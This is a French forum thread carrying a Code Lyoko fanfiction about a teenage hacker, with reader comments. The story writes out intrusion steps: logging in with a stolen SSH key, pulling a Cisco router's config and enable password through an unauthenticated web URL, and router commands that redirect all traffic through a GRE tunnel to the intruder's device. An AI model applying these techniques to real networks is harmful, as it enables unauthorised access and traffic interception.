root:~> find
.ssh
.ssh/known_hosts
.ssh/id_dsa
.ssh/id_dsa.pub
.ssh/config
root:~> cat .ssh/config
Host 10.235.71.113
CheckHostIP yes
StrictHostKeyChecking yes
Port 22
Protocol 2
SendEnv LANG LC_*
HashKnownHosts yes
User f.hopper

« Il y avait un serveur ssh2 sur 10.235.71.113 avec un utilisateur f.hopper et où on pouvait se via une clef publique.» Decoda-t-il. « Peut-on encore s'y logguer ?»

"shell" a écrit :

root:~> ssh 10.235.71.113
Last login: Tuesday, 31 December 1996 23:59:59 from 150.177.2.193
SC>


«Je me disais bien que je ne devais pas être loin du SC.» s'exclama Nico.
Il utilisa ssh pour se logguer sur un serveur de shell gratuit.

"shell" a écrit :

SC> ssh -l qwerty1 st0rage.org
The authenticity of host 'ssh.unhandledexceptions.com (69.128.116.234)' can't be established.
RSA key fingerprint is 43:97:d3:0b:a0:46:9a:b0:11:e8:33:45:2f:25:cd:cd.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'ssh.unhandledexceptions.com' (RSA) to the list of known hosts.
Password:
Linux ssh.unhandledexceptions.com 2.4.26-1-386 #1 Tue Aug 24 13:31:19 JST 2004 i686

Please behave yourself.

Rules:

1) No running sevices, unless you have permission from Termina. This includes irc bots, vnc, etc.

2) IRC clients are allowed. No EggDrop/bots allowed.

3) Do not attempt to view/access files belonging to other users.

4) Report any problems you find immediatly to termina@gmail.com

5) Any abuse (.plan, etc) will result in immediate account deletion, and IP ban from both site and IRC.

Thanks for your understanding

Last login: Thu Apr 26 10:40:19 2007 from mail.boursorama.fr
qwerty1@ssh:~$ finger qwerty1
Login: qwerty1 Name:
Directory: /home/qwerty1 Shell: /bin/bash
On since Thu Apr 26 10:42 (CDT) on pts/28 from 0.2.3.5
2 seconds idle
No mail.
No plan.
qwerty1@ssh:~$ host 150.177.2.193
193.2.177.150.in-addr.arpa domain name pointer m830w193.ftmeade.army.mil.

« Bon, la liaison vers Internet fonctionne, SSH est autorisé en sortie.
Par contre les anomalies s'accumulent:
- l'ip est totalement fantaisiste et non routable sur Internet.
- Franz Hopper s'est loggué sur le SC d'appartir une machine de la NSA alors qu'il les avait aux trouses ...» dit tout haut Nico.

«Bon travail de déduction jeune homme !» entendit Nico derriére lui.
Il se retourna lentement et decouvrit un amas de lumiére.
- Mr Franz Hopper je suppose ?
- A votre avis ?

«Oula, ca commence bien» se dit Nico

===> Je rattache des elements réels à l'histoire.
J'ai tenté de rendre comprehensible les elements techniques.
Si c'est toujours incomprehensible, dites-le moi !

===> J'essaie d'eviter le piége du personnage personnel qui devient le hero de Code Lyoko.
Nico ne sera pas un Jérémie-bis.

nicolas
26/04/07 à 17:43
Bon ben , points négatifs:
-C'est toujours aussi incompréhensible.
-Du coup on a beaucoup de mal a ne pas perdre le fil.

@«»©®ø€€åýðþ
26/04/07 à 18:07
:-(
Tu as laché à quel moment ?

Quelque explication pour que ce soit plus claire:

Je me sers des quote pour montrer ce qui est affiché.
En gras c'est les entrés utilisateurs.

SSH est un protocole servant principalement à prendre le contrôle à distance ou à ouvrir une session sur un serveur (linux, *bsd, mac os x et même windows dans certain cas).

st0rage.org intervient pour donner 2 informations importante:
- l'origine de la connection à distance le 31 Decembre 1996 de Franz Hopper: Fort Meade, siége de la NSA
- le SuperCalculateur a un accés au Net trés étrange: une ip en 0.2.3.5.

yami no kitsune
27/04/07 à 16:04
J'ai absolument rien compris au début de ta fic :evil:

nicolas
27/04/07 à 17:35
"@«»©®ø€€åýðþ" a écrit :
:-(
Tu as laché à quel moment ?



J'ai survolé en lisant les bouts les plus compréhensibles.

fiction[Nico]
28/04/07 à 17:14
"yami no kitsune" a écrit :
J'ai absolument rien compris au début de ta fic :evil:


Au début, j'accéde via une faille à un serveur de la NSA et j'arrive à recuperer plusieures archives.
Je me trés rapidement découvert et je m'en sort uniquement grâce à ma chaine de relais.

Plus tard, quand la chasse à l'homme s'est calmé, je decompresse un des archives et je decrypte des fichiers de Franz Hopper via une faille dans PGP (dont l'auteur de la fiction a un peu exageré les effets: voire https://linuxfr.org/2001/03/22/2864.html ).

Dans les fichiers decompressé de la NSA, il y avait un document Word que j'ai ouvert. Il contenait une macro qui a «téléphoné à la maison» et seule la chaine de relais m'a aidé à m'en sortir une fois encore.
(Tor en est une et l'auteur à un node Tor de sortie actif.)

Les années passent et je me retrouve au collége Cadic.
Pendant la récreation, en cherchant un accés à Internet via WIFI, je trouve un AP qui à une MAC composé de nombre premier et dont le nom me fait tiquer.
Utilisant un soft appellé Airodump (faisant partie de la suite aircrack-ng), j'arrive à determiner les machines connecté à ce réseau et leur position geographique (avec plus ou moins de bonheur).

Suivant Jérémie à l'usine, j'arrive au début d'une attaque de Xana et j'arrive à le désactiver un à l'arrache en utilisant une erreur (volontaire ?) de permission sur Screen.
(Wikipedia dit: GNU Screen [..] est un multiplexeur de terminaux en mode texte. Screen est développé par le Projet GNU. Il permet à un utilisateur d'accéder de multiples sessions de terminal à l'intérieur d'une simple fenêtre de terminal, ou d'une session distante typiquement lancée par ssh. C'est pratique pour gérer de multiples processus.)

En faisant ça, j'ai bousillé le Message Bus System du Super-calculateur et Lyoko commença à planter sérieusement.

Bon, j'arrive a rétablir la situation mais Jeremie me prenant en traitre lance un retour dans le passé.

Bizarrement, au lieu d'arriver à Cadics et de perdre la memoire, je me retrouve dans un environnement virtuel.
Un shell apparait devant moi et je montre mes skills en hacking :)

Serieusement ? Je vois un prompt de login, je tape root et j'essai plusieur mot de passe.
Un est valide alors je me renseigne sur la machine.
Je deduis de la configuration quelque trucs sans trop d'importance (Hum, l'auteur me dit de me mefier ? J'ai comme l'impression que je reverrais bientôt ce systéme ...).

Fouillant le repertoire du super-utilisateur, je trouve un fichier de configuration de SSH et une clef privé de Franz Hopper :D
J'utilise les information du fichier de configuration pour me logger sur la machine distante et je me retrouve devant le prompt du supercalculateur.

Je tente donc tout naturellement de me connecter à un serveur Internet histoire de determiner les murs de ma prison.

Mais il n'y avait pas de murs pour ssh et je retrouve sur st0rage.org.
Je determine l'ip du SC et j'ai une belle surprise.

Je ne sais comment Hopper s'est debrouillé mais il a réussis à rendre routable sur Internet une adresse dans la plage 0.0.0.0-0.255.255.255 !
Franchement, la je lui tire mon chapeau !

En outre, je decouvre dans les logs du SC que Hopper s'est loggué d'une machine de la NSA le 31 decembre 1996 (c'etait un Mardi au faite :) )

Quelque secondes aprés la fin de mes reflexions, Hopper fait retentir sa voie dans mon dos.

J'ai comme l'impression que je me suis encore foutu dans une situation impossible comme d'hab :)


Nico.

@«»©®ø€€åýðþ
21/05/07 à 14:27
** ..., ... ***

- Vu où je me trouve, la réponse est probablement oui mais vu les circonstances de mon arrivé, il valait mieux acquerir des données plus ou moins fiable.
Cela étant possé, pourquoi m'avoir amené ici ?
- Vous avez failli planter le SC et me tuer au passage!
Et vous avez le culot de me demander pourquoi ?
- Oui. Donc pourquoi ?
- Parce que je veux savoir qui vous êtes.
Vous avez utiliser des commandes et des clefs qui ne sont connus que de moi seul.
- Celle que décrit votre journal ?
- [silence] Où avez trouver ce fichier et comment l'avez vous ouvert ?
- Sur un serveur de la NSA il y a quelque année. Et puis vous aviez utilisé un alglo foireux de PGP donc la clef privé a été vite cassée.

[re silence]

Nico regarda de nouveau la console qui affiché toujours le qwerty1@ssh:~$.
Mettant au défi Franz Hopper de dire quelque chose, il coupa la connection au SC et commença à se bidouiller un compte.

- On ne vous a jamais dit que c'etait impoli de créé des comptes surtout ayant des priviléges administrateurs sur des machines qui ne vous appartiennent pas.
- Déformation professionnel.
- De toute façon, cela va etre effacé ...
- Pas encore un retour vers le passé !
- J'ai suspendus le précedant pour vous parler mais l'équipement ne va pas pouvoir continuait longtemps dans cet état. Et vous ne chercherai plus a acceder à Xanadu. Retour dans le passé !

Pendant que Franz Hopper parlait, Nico avait rétablis une liaison SSH avec le SC sans se faire remarquer.
Il s'ajouta à la liste des personnes à qui il fallait preserver la mémoire et lanca un petit processus discret.
Il venait juste de terminer de taper lorsque la bulle blanche l'engloba.

** Le matin du jour d'avant la rentrée, Nico **

Nico se retrouva devant son ordinateurs portable, dans son QG, le matin de la rentrée des classes.
Il réflechis quelques secondes à ce qui venait de se passer puis pris une décision.
«Je n'aime pas quand on tente de modifier ma memoire Mr Hopper. Et si je veut participer a votre jeux qui est plutôt dangereux pour le monde, vous ne pourrez pas m'en empecher.»

Trés vite, il acceda a une machine du rectorat puis utilisant le VPN servant à l'administration à distance du firewall/serveur proxy, il se loggua dans une des machines de l'administration du collége Kadic et changea son affectation:
«Je change de classe et je me met dans celle de Jeremy. »

Il se deconnecta quelques minutes plus tard.

Il chercha dans son foutoir un Soekris, vida rapidement la carte Flash et y installa un OS minimal.
Il passa quelque minutes a monter dedans une carte ethernet un peu spécial puisque supportant des débit de l'ordre des 10Gb/s en faisant trés peu travailler le CPU.
Il l'alluma, installa quelques programmes, pré-configura une suite d'utilitaire, le script de démarrage et adapta la configuration du firewall.
Il atteignit la machine et la mis dans un sac avec quelque cables, des tournevis et de l'adhésif double face.

«Rock'n'roll !» se dit-il en sortant du QG et en prenant la direction de l'usine.

--

Quelque termes:
Liste :

[*:34itsmei]VPN: Virtual Private Network Ou Réseau Privé Virtuel: Cela permet de créé une pseudo LAN entre des machines connecté à Internet et situé à des endroits different. Les liaisons entre les differentes machines de la pseudo-LAN sont sécurisé.[/*:m:34itsmei]
[*:34itsmei]Soekris: C'est le nom d'une marque de carte mére permettant de construire des equipements comme des routeurs, bornes WIFI, firewall, NAS, etc.. dans de petit boitiers et consommant peu.[/*:m:34itsmei]


J'ai essayé de faire beaucoup plus simple techniquement.


03/06/07 à 19:22
Franchement, j'adhère :p

Une fanfiction sur CL avec des termes informatiques, il faillait y penser et surtout la réaliser. Apres il est possible que les termes technique limite le nombre de personnes qui ont comprit/aiment la fic m'enfin bon...

Il y a une petite incohérence : tu dit qu'il n'y a pas d'acces à internet et plus bas tu dit réussir à te connecter en SSH sur un host distant :p

yami no kitsune
03/06/07 à 19:28
C'est complexe l'écriture que tu utilise :pale: :pale:
J'ai un peu de mal à comprendre mais continue, stp ^^

spidernico
04/06/07 à 16:07
"yami no kitsune" a écrit :
C'est complexe l'écriture que tu utilise :pale: :pale:
J'ai un peu de mal à comprendre mais continue, stp ^^


Codes informatique ==> Ecriture informatique ==> Vous n'avez rien compris !

En ce qui me concerne, je suis exellent en informatique (JE NE ME VANTE PAS !!!!!!!!!) et je comprend tout à ce que tu as écrit ! Et pour une fois, c'est une bonne idée de créer une fanfic avec que du langage informatique !

yami no kitsune
04/06/07 à 20:45
Tu veux qu'on t'appel Einstein ou Jérémie :?: ;) :lol: :lol: :lol: :lol:
MDR MDR MDR MDR. Sérieux, j'aime bien la fic mais je saute les passage informatiques ;) , c'est plus simple 8)

sam101
05/06/07 à 17:56
That's a good fic :)

Dommage que les commandes soient fantaisistes (pour trouver l'uptime,rien de mieux que ... uptime ? XD)

@«»©®ø€€åýðþ
08/06/07 à 15:09
"Anonymous" a écrit :

Il y a une petite incohérence : tu dit qu'il n'y a pas d'acces à internet et plus bas tu dit réussir à te connecter en SSH sur un host distant :p

Le terminal dans lyoko donne un accés à une machine isolé d'Internet.
Mais elle est connecté au SC, donc le SC sert de relais pour sortir vers Internet.
Aprés, l'IP source est fantaisiste ce qui indique que Nico va avoir une surprises en tentant de brancher sa Soekris.

"sam101" a écrit :
That's a good fic :)

Dommage que les commandes soient fantaisistes (pour trouver l'uptime,rien de mieux que ... uptime ? XD)


A part le show user * summary du début qui aurait du etre un w (mais je doute que beaucoup de monde connaissent cette commande [quelqu'un peut le changer en show users /full si chére aux administrateurs openVMS ?]), le reste est valide.

sam101
09/06/07 à 17:11
Personellement,j'arrive pas a faire un Show sur ma becane ^^.Mais effectivement,cela doit être ca :p


09/06/07 à 17:34
Code :

GEIN $ show user /full
OpenVMS User Processes at 9-JUN-2007 15:29:15.75
Total number of users = 22, number of processes = 31

Username Node Process Name PID Terminal
ANALYZE GEIN ANALYZE 20234997 FTA5704:
(ssh/125.160.98.191:1569)
ARPANET GEIN ARPANET 2023824A FTA5710:
(ssh/cactus.8-bit-system.info:2144)
BURLEY GEIN BATCH_386 2021621F (Batch)
DAHMER GEIN DAHMER 20226B8F FTA4956:
(ssh/pool-71-103-86-86.lsanca.dsl-w.verizon.net:50096)
DEMO GEIN DEMO 20212B09 FTA1982:
(ssh/mary015-0b03-dhcp-193.bu.edu:4253)
DEMO GEIN SSHD 0035A PTD 2021B529 FTA3457:
(ssh/sge91-2-82-227-33-164.fbx.proxad.net:1268)
DEMO GEIN SSHD 0176A PTD 2021EE58 FTA3969:
(ssh/fhtagn.democrite.net:41275)
DEMO GEIN SSHD 0277A PTD 20233E56 FTA5712:
(ssh/xanadu.devnull.co.uk:62260)
DEMO MANSON DEMO 204034D5 FTA37: (ssh/82.160.127.23:1036)
DEMO MANSON SSHD 0418A PTD 2040351F FTA38: (ssh/82.160.127.23:1036)
DOODAAMAN GEIN DOODAAMAN 202354D6 NTY8342:
(60-240-185-196.tpgi.com.au)
DOODAAMAN MANSON DOODAAMAN 204078E1 NTY2719:
(60-240-185-196.tpgi.com.au)
ERICR GEIN ERICR 20225816 FTA5399:
(ssh/heroes.rutgers.edu:37547)
FERD GEIN FERD 20232486 FTA5694:
(ssh/134.210.94.219:2100)
FOUTA GEIN FOUTA 20218F6D FTA3804:
(ssh/41.224.254.241:3523)
FOUTA GEIN SSHD 0242A PTD 2022C2C0 FTA5013:
(ssh/41.224.235.161:3150)
ILLARKUL GEIN ILLARKUL 20234B4E FTA5604:
(ssh/spc3-ward3-0-0-cust645.bagu.broadband.ntl.com:50652)
JONM GEIN JONM 2022C2CD FTA5657:
(ssh/80-195-193-46.cable.ubr01.sutt.blueyonder.co.uk:59611)
MEATE0R GEIN MEATE0R 20215692 FTA2624: (ssh/217.22.55.50:36801)
NINNY17 MANSON NINNY17 20406EA5 NTY2666:
(168.176.103-84.rev.gaoland.net)
NSOMNIAC GEIN SSHD 0865A PTD 2022A26C FTA5625:
(ssh/adsl-75-32-168-35.dsl.rcsntx.sbcglobal.net:1341)
OBRIEN GEIN OBRIEN 2022DFCB FTA5419:
(ssh/eeq194.internetdsl.tpnet.pl:42960)
PREDDY GEIN PREDDY 2022A130 FTA5239:
(ssh/ip49-10-166-62.adsl.versatel.nl:41016)
PREDDY GEIN SSHD 0260A PTD 2022DB83 FTA5699:
(ssh/ip49-10-166-62.adsl.versatel.nl:52672)
SHIFOE GEIN SHIFOE 20216EA1 FTA2688:
(ssh/72-254-1-131.client.stsn.net:2406)
STEVO GEIN STEVO 20226461 FTA4852:
(ssh/cpc2-linc7-0-0-cust204.nott.cable.ntl.com:41321)
SXDC MANSON SXDC 20407428 NTY2689:
(219-84-180-31-adsl-tan.dynamic.so-net.net.tw)
TAD GEIN TAD 20234F54 FTA5711:
(ssh/pool-71-97-254-3.ptldor.dsl-w.verizon.net:4106)
VARDAN GEIN SSHD 0268A PTD 2022D980 FTA5703: (ssh/82.198.1.11:3674)
VARDAN GEIN VARDAN 2022A2B6 FTA5700: (ssh/82.198.1.11:1266)
ZAMOCNY GEIN ZAMOCNY 20223963 FTA4264:
(ssh/host-81-190-40-103.szczecin.mm.pl:3459)
GEIN $


Suffit d'avoir le bon OS pour avoir les bonnes commandes :)

frank9321
04/10/07 à 22:29
Supet fic, j'attends vraiment la suite.
Pour ceux qui connaissent les commandes, et qui aiment l'informatique, c'ette fic est un regal. je t'ecourage vraiment a poster la suite
.

@«»©®ø€€åýðþ
01/04/08 à 18:27
** Vers Midi, Nico**

Nico arrivait en vue de l'usine quand il vit Jérémie sortir de l'usine avec Aelita.
Il se cacha et tenta d'ecouter leur discution:
« Non, je ne sais pas qui était ce Nico. Je vais voir dans les fichiers du collège ce que je peut trouver.
- En tous cas, il semble connaitre le SC et Lyoko. Malgrés le retour dans le passé, il peut être dangereux.
Tu as bien fait de verrouiller l'ascenseur.»
Ils passerent sans voir Nico qui pensait «dangereux pour qui ?» et sortirent de son champ visuel.

Nico entra dans l'usine et sans surprise constata qu'il ne pouvait ouvrir la porte de l'ascenseur.
«Bon reflechissons, je peut pas passer par là. Et il n'y a que dans les films que le systéme d'aeration est suffisant grand pour laisser passer une personne.»
Soudain, il se rendit compte qu'il y avait forcement un passage d'entretien en cas de panne de l'ascenseur.
Il commença à en chercher des traces, finit par trouver une trappe, l'ouvrit et son visage s'orna d'un sourire: il y avait une echelle de barreau !
Il sortit sa lampe de torche et descendit.

Quelque dizaine de mètre plus bas, il ouvrit une autre trappe et tomba dans une salle noir eclairé par des leds verte de different appareils.
Eclairant les differents appareils avec sa lampe de torche, il commença à déterminer leur fonction.
«Un routeur cisco 7200, du cable cat5 qui part vers quelque part, ha c'est la Sun Ultra Entreprise dans laquel Hopper m'avait piége !»

Il brancha son laptop sur un port RJ-45, recupera une IPv4 par DHCP, lança nmap contre le routeur et vit que le routeur avait le serveur HTTP actif.
Ouvrant Firefox, il atteignit le router par son addresse 10.235.71.1 et tenta de recupéré l'URL /99/exec/-/show/config.
Une longue page s'ouvrit, devoilant la configuration du routeur dont son mot de passe enable.
Il lança un rapide telnet, se loggua en tant qu'admin, fais enable et faut recompenser par un prompt cisco#

Il sortit son Soekris, trouva une prise, la brancha au routeur et attendis quelque instant.
Dans la fenêtre telnet,une ligne signala l'attribution d'une nouvelle addresse IPv4 par DHCP.
Il s'y connecta en ssh2 via sa clef publique et reconfigura la machine en addresse ipv4 statique, chargea le module gre dans le kernel et se frotta les mains.
«Je connais un chouette hack avec GRE. On va voir si ca passe ;) »

"Routeur cisco" a écrit :

cisco#conf t
Enter configuration commands, one per line. End with CNTL/Z.
cisco(config)#int tunnel0
cisco(config-if)#desc Nico was here.
cisco(config-if)#ip address 1.1.1.1 255.255.255.0
cisco(config-if)#tunnel source eth0
cisco(config-if)#tunnel dest 10.235.71.142
cisco(config-if)#tunnel mode gre ip
cisco(config-if)#exit
cisco(config)#


«Donc voila, j'ai créé un tunnel GRE vers la Soekris qui est en 10.235.71.142. Sur ce tunnel, le routeur aura l'IPv4 1.1.1.1.
Il faut que je configure la Soekris ...»
Quelque ligne de ifconfig plus tard, il tenta de pinger sa Soekris à travers le tunnel GRE:
"Routeur cisco" a écrit :

cisco#ping 1.1.1.2
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 1.1.1.2, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 8/8/8 ms


«Maintenant, ne pas casser le routage quand on va activer ce hack .»
Quelque ligne de plus en root plus tard, la Soekris routa tout ce qui lui arrivait sur le tunnel GRE vers l'addresse IPv4 1.1.1.1.

«Plus que 3 truc à faire: une regle firewall qui autorise tout, un route-map vers le tunnel GRE et l'affectation de ce route-map à l'interface qui communique avec le SC.»
"Routeur cisco" a écrit :

cisco(config)#access-list 123 permit tcp any any
cisco(config)#route-map nicohack
cisco(config-route-map)#match ip address 123
cisco(config-route-map)#set ip next-hop 1.1.1.2
cisco(config-route-map)#exit
cisco(config)#int eth0
cisco(config-if)#ip policy route-map nicohack
cisco(config-if)#exit
cisco(config)#exit


«Bon maintenant, l'instant de vérité !» se dit Nico en tapant le dernier exit.
Route-map disant au routeur d'ignorer tout ce qu'il savait du routage pour envoyer tout le traffic sur une addresse Ipv4, la Soekris commença a recevoir du traffic et en transmettre.

Il relança les different scripts qu'il avait ecris sur la Soekris, verifia qu'elle était bien inseré dans son VPN et commença en rangé son matériel.

Quelque dizaine de minutes plus tard, il avait finis et commençait la remonté vers la surface.
Il sortit de l'usine et evita de peu la rencontre avec Jérémie.

«Je devrait arreter de jouer avec ma chance» se dit-il avant que rentrait à son QG.



---
ps:
J'espere que je n'ai perdu personne pendant la description du hack à l'aide de GRE.
GRE est un protocol permettant d'etablir des tunnels entre different ordinateur.
Vous pouvez avoir de l'ip sur de l'ip.
C'est utilisé dans les VPN non securisé :)

Sinon, l'idée de cette utilisation de GRE ne vient pas de moi.
Elle vient d'une série de livre intitulé Stealing the network.
ps2: Cette partie trainait sur mon HDD depuis un moment.
J'espere qu'elle vous plait.

KentinWede
01/04/08 à 18:48
Yahou ! J'adore ! Je n'ai pas encore le niveau assez élevé pour tout assimiller, mais j'ai tout compris! (sans rire) Continue je t'en prie ! c'est excelent !
J'ai essayé récemment le style avec ma fic "Déja vu" dans la section divers, mais jamais je ne pourrais dépasser ton niveau ! (en informatique)

Tinky
01/04/08 à 21:08
Eu égard ton niveau en informatique, tu devrais te risquer à construire un ordinateur quantique comme le supercalculateur et le programmer... je parie que ça fonctionnerait ! Mais tout de même, ça pourrait être un peu périlleux.

En tout cas, c'est excellent d'avoir imaginé les lignes de programmation utilisées par Nico le hacker surdoué... Et ses petits bidouillages aussi !
J'avais presque l'impression d'être devant les applications que j'utilise dans mon travail !
Excellent !

Snape
01/04/08 à 21:22
"yami no kitsune" a écrit :
Tu veux qu'on t'appel Einstein ou Jérémie :?: ;) :lol: :lol: :lol: :lol:
MDR MDR MDR MDR. Sérieux, j'aime bien la fic mais je saute les passage informatiques ;) , c'est plus simple 8)

et oui ! Moi aussi je suis meilleur en potions que devant un PC... Sur ce, je suis un peu comme Odd et les autres un vrai "0" en informatique.